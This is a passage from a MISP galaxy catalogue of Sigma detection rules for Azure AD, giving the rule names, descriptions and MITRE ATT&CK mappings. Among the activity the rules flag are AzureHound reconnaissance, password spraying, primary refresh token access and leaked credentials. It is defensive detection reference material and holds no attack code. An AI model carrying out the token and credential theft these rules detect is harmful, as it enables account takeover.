Detects AzureHound (a BloodHound data collector for Microsoft Azure) activity via the default User-Agent that it uses during its operation after successful authentication.

The tag is: misp-galaxy:sigma-rules="Discovery Using AzureHound"

Discovery Using AzureHound has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526" with estimative-language:likelihood-probability="almost-certain"

Table 11278. Table References

Links

https://github.com/BloodHoundAD/AzureHound

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml

Account Lockout

Identifies a user account that has been locked because the user tried to sign in too many times with an incorrect user ID or password.

The tag is: misp-galaxy:sigma-rules="Account Lockout"

Account Lockout has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11279. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_account_lockout.yml

Sign-ins by Unknown Devices

Monitors and alerts for sign-ins by unknown devices from non-trusted locations.

The tag is: misp-galaxy:sigma-rules="Sign-ins by Unknown Devices"

Sign-ins by Unknown Devices has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11280. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml

Multifactor Authentication Interrupted

Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can’t pass the MFA challenge.

The tag is: misp-galaxy:sigma-rules="Multifactor Authentication Interrupted"

Multifactor Authentication Interrupted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Request Generation - T1621" with estimative-language:likelihood-probability="almost-certain"

Table 11281. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml

Multifactor Authentication Denied

The user has indicated that they did not initiate the MFA prompt, which could indicate an attacker has the password for the account.

The tag is: misp-galaxy:sigma-rules="Multifactor Authentication Denied"

Multifactor Authentication Denied has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Request Generation - T1621" with estimative-language:likelihood-probability="almost-certain"

Table 11282. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_denies.yml

Failed Authentications From Countries You Do Not Operate Out Of

Detects failed authentications from countries you do not operate out of.

The tag is: misp-galaxy:sigma-rules="Failed Authentications From Countries You Do Not Operate Out Of"

Failed Authentications From Countries You Do Not Operate Out Of has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11283. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml

Login to Disabled Account

Detects failed attempts to sign in to disabled accounts.

The tag is: misp-galaxy:sigma-rules="Login to Disabled Account"

Login to Disabled Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11284. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml

Suspicious SignIns From A Non Registered Device

Detects risky authentication from a non-AD-registered device without MFA being required.

The tag is: misp-galaxy:sigma-rules="Suspicious SignIns From A Non Registered Device"

Suspicious SignIns From A Non Registered Device has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11285. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml

Azure AD Only Single Factor Authentication Required

Detects when users are authenticating without MFA being required.

The tag is: misp-galaxy:sigma-rules="Azure AD Only Single Factor Authentication Required"

Azure AD Only Single Factor Authentication Required has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication - T1556.006" with estimative-language:likelihood-probability="almost-certain"

Table 11286. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml

Sign-ins from Non-Compliant Devices

Monitors and alerts for sign-ins where the device was non-compliant.

The tag is: misp-galaxy:sigma-rules="Sign-ins from Non-Compliant Devices"

Sign-ins from Non-Compliant Devices has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11287. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml

Azure Unusual Authentication Interruption

Detects when there is an interruption in the authentication process.

The tag is: misp-galaxy:sigma-rules="Azure Unusual Authentication Interruption"

Azure Unusual Authentication Interruption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11288. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml

Application Using Device Code Authentication Flow

Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.

The tag is: misp-galaxy:sigma-rules="Application Using Device Code Authentication Flow"

Application Using Device Code Authentication Flow has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11289. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml

Account Disabled or Blocked for Sign in Attempts

Detects when an account that is disabled or blocked for sign-in nevertheless attempts to log in.

The tag is: misp-galaxy:sigma-rules="Account Disabled or Blocked for Sign in Attempts"

Account Disabled or Blocked for Sign in Attempts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11290. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml

Password Spray Activity

Indicates that a password spray attack has been successfully performed.

The tag is: misp-galaxy:sigma-rules="Password Spray Activity"

Password Spray Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11291. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml

Suspicious Inbox Manipulation Rules

Detects when suspicious rules that delete or move messages or folders are set on a user’s inbox.

The tag is: misp-galaxy:sigma-rules="Suspicious Inbox Manipulation Rules"

Suspicious Inbox Manipulation Rules has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11292. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml

Anonymous IP Address

Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

The tag is: misp-galaxy:sigma-rules="Anonymous IP Address"

Anonymous IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11293. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address

https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml

New Country

Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.

The tag is: misp-galaxy:sigma-rules="New Country"

New Country has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11294. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml

Suspicious Inbox Forwarding Identity Protection

Indicates suspicious rules, such as an inbox rule that forwards a copy of all emails to an external address.

The tag is: misp-galaxy:sigma-rules="Suspicious Inbox Forwarding Identity Protection"

Suspicious Inbox Forwarding Identity Protection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11295. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml

Atypical Travel

Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

The tag is: misp-galaxy:sigma-rules="Atypical Travel"

Atypical Travel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11296. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml

Primary Refresh Token Access Attempt

Indicates an access attempt to the PRT resource, which can be used to move laterally into an organization or perform credential theft.

The tag is: misp-galaxy:sigma-rules="Primary Refresh Token Access Attempt"

Primary Refresh Token Access Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11297. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml

Sign-In From Malware Infected IP

Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.

The tag is: misp-galaxy:sigma-rules="Sign-In From Malware Infected IP"

Sign-In From Malware Infected IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11298. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml

Malicious IP Address Sign-In Suspicious

Indicates a sign-in from an IP address known to be malicious at the time of sign-in.

The tag is: misp-galaxy:sigma-rules="Malicious IP Address Sign-In Suspicious"

Malicious IP Address Sign-In Suspicious has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11299. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml

Unfamiliar Sign-In Properties

Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.

The tag is: misp-galaxy:sigma-rules="Unfamiliar Sign-In Properties"

Unfamiliar Sign-In Properties has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11300. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml

Malicious IP Address Sign-In Failure Rate

Indicates sign-in from a malicious IP address based on high failure rates.

The tag is: misp-galaxy:sigma-rules="Malicious IP Address Sign-In Failure Rate"

Malicious IP Address Sign-In Failure Rate has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11301. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml

SAML Token Issuer Anomaly

Indicates that the issuer of the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns.

The tag is: misp-galaxy:sigma-rules="SAML Token Issuer Anomaly"

SAML Token Issuer Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"

Table 11302. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml

Azure AD Account Credential Leaked

Indicates that the user’s valid credentials have been leaked.

The tag is: misp-galaxy:sigma-rules="Azure AD Account Credential Leaked"

Azure AD Account Credential Leaked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"

Table 11303. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml

Anomalous Token

Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.

The tag is: misp-galaxy:sigma-rules="Anomalous Token"

Anomalous Token has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11304. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml

Azure AD Threat Intelligence

Indicates user activity that is unusual for the user or consistent with known attack patterns.

The tag is: misp-galaxy:sigma-rules="Azure AD Threat Intelligence"

Azure AD Threat Intelligence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11305. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml

Activity From Anonymous IP Address

Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

The tag is: misp-galaxy:sigma-rules="Activity From Anonymous IP Address"

Activity From Anonymous IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11306. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml

Impossible Travel

Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

The tag is: misp-galaxy:sigma-rules="Impossible Travel"

Impossible Travel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11307. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml

Suspicious Browser Activity

Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser.

The tag is: misp-galaxy:sigma-rules="Suspicious Browser Activity"

Suspicious Browser Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11308. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml

Anomalous User Activity

Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.

The tag is: misp-galaxy:sigma-rules="Anomalous User Activity"

Anomalous User Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11309. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml

End User Consent

Detects when an end user consents to an application.

The tag is: misp-galaxy:sigma-rules="End User Consent"

End User Consent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11310. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml

App Role Added

Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.

The tag is: misp-galaxy:sigma-rules="App Role Added"

App Role Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11311. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_role_added.yml

Change to Authentication Method

A change to an authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.

The tag is: misp-galaxy:sigma-rules="Change to Authentication Method"

Change to Authentication Method has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11312. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml

Guest User Invited By Non Approved Inviters

Detects when a user that doesn’t have permissions to invite a guest user attempts to invite one.

The tag is: misp-galaxy:sigma-rules="Guest User Invited By Non Approved Inviters"

Guest User Invited By Non Approved Inviters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11313. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml

Temporary Access Pass Added To An Account

Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated.

The tag is: misp-galaxy:sigma-rules="Temporary Access Pass Added To An Account"

Temporary Access Pass Added To An Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11314. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_tap_added.yml

Azure Subscription Permission Elevation Via AuditLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn’t planned. This setting could allow an attacker access to Azure subscriptions in your environment.

The tag is: misp-galaxy:sigma-rules="Azure Subscription Permission Elevation Via AuditLogs"

Azure Subscription Permission Elevation Via AuditLogs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11315. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml

Account Created And Deleted Within A Close Time Frame

Detects when an account was created and deleted in a short period of time.

The tag is: misp-galaxy:sigma-rules="Account Created And Deleted Within A Close Time Frame"

Account Created And Deleted Within A Close Time Frame has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11316. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml

Bitlocker Key Retrieval

Monitor and alert for Bitlocker key retrieval.

The tag is: misp-galaxy:sigma-rules="Bitlocker Key Retrieval"

Bitlocker Key Retrieval has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11317. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml

Added Owner To Application

Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.

The tag is: misp-galaxy:sigma-rules="Added Owner To Application"

Added Owner To Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

Table 11318. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_owner_added.yml

Password Reset By User Account

Detects when a user has reset their password in Azure AD.

The tag is: misp-galaxy:sigma-rules="Password Reset By User Account"

Password Reset By User Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11319. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_user_password_change.yml

User Added To Group With CA Policy Modification Access

Monitor and alert on membership additions to groups that have CA policy modification access.

The tag is: misp-galaxy:sigma-rules="User Added To Group With CA Policy Modification Access"

User Added To Group With CA Policy Modification Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11320. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml

Azure Domain Federation Settings Modified

Identifies when a user or application modified the federation settings on the domain.

The tag is: misp-galaxy:sigma-rules="Azure Domain Federation Settings Modified"

Azure Domain Federation Settings Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11321. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_federation_modified.yml

Added Credentials to Existing Application

Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.

The tag is: misp-galaxy:sigma-rules="Added Credentials to Existing Application"

Added Credentials to Existing Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

Table 11322. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_credential_added.yml

Bulk Deletion Changes To Privileged Account Permissions

Detects when a user is removed from a privileged role. Bulk changes should be investigated.

The tag is: misp-galaxy:sigma-rules="Bulk Deletion Changes To Privileged Account Permissions"

Bulk Deletion Changes To Privileged Account Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11323. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml

User Added To Privilege Role

Detects when a user is added to a privileged role.

The tag is: misp-galaxy:sigma-rules="User Added To Privilege Role"

User Added To Privilege Role has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11324. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml

App Granted Microsoft Permissions

